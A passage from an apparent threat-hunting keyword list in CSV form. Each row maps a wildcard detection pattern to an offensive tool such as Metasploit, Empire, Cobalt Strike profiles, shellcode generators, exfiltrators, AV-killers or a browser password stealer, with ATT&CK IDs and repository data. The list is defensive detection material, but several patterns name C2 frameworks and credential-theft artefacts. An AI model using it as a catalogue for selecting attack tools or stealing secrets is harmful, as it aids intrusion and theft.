T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*metagoofil*,offensive_tool_keyword,metagoofil,Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.,T1213 - T1596 - T1083 - T1082,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/laramies/metagoofi,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*metame -i *.exe*,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,0,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z -*Metasploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*metasploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit/framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit/peass.rb*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*metasploit_framework.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit-framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit-framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*metasploitframework*.msi*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MetasploitPayload.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*metatwin.ps1*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*metatwin-master*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*meterpreter*.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*meterpreter.*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*Meterpreter.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*meterpreter.sl*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*meterpreter_*.rb,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*meterpreter_loader*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*METERPRETER_STAGER*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*MeteTool*,offensive_tool_keyword,MeteTool,Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.,T1059.003 - T1064 - T1135 - T1059.007,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/S-S-X/metatool,1,0,N/A,N/A,1,2,1,2023-06-10T06:24:14Z,2020-05-09T19:09:17Z -*methodHash*528465795*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*methods::dns::dns_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*methods::https::https_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*methods::icmp::icmp_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Metro-Holografix/CSExec*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*Metro-Holografix/Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*metsrv.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*metterpreter*,offensive_tool_keyword,metasploit-payloads,shell payload,T1059.001 - T1027 - T1210.001,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-payloads,1,1,N/A,N/A,10,1555,675,2023-10-02T13:11:58Z,2014-04-03T21:18:24Z -*MFASweep.ps1*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*mgeeky/PackMyPayload*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*mgeeky/RedWarden*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*mhaskar/Octopus*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*mhngpdlhojliikfknhfaglpnddniijfh*,greyware_tool_keyword,WorkingVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*mhuzaifi0604/spellbound*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*mhydeath.exe*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*mhydeath-master*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*micahvandeusen/gMSADumper*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -*micr0 shell.py*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*micr0_shell-main*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*micr0shell.py *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*microbrownys.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*MicroBurst.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-Az.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureAD*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureREST*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureRM*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-master*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-Misc.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-MSOL*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*microchsse.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microlilics.crabdance.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*micronaoko.jumpingcrab.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microplants.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microsoft-edge/cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - 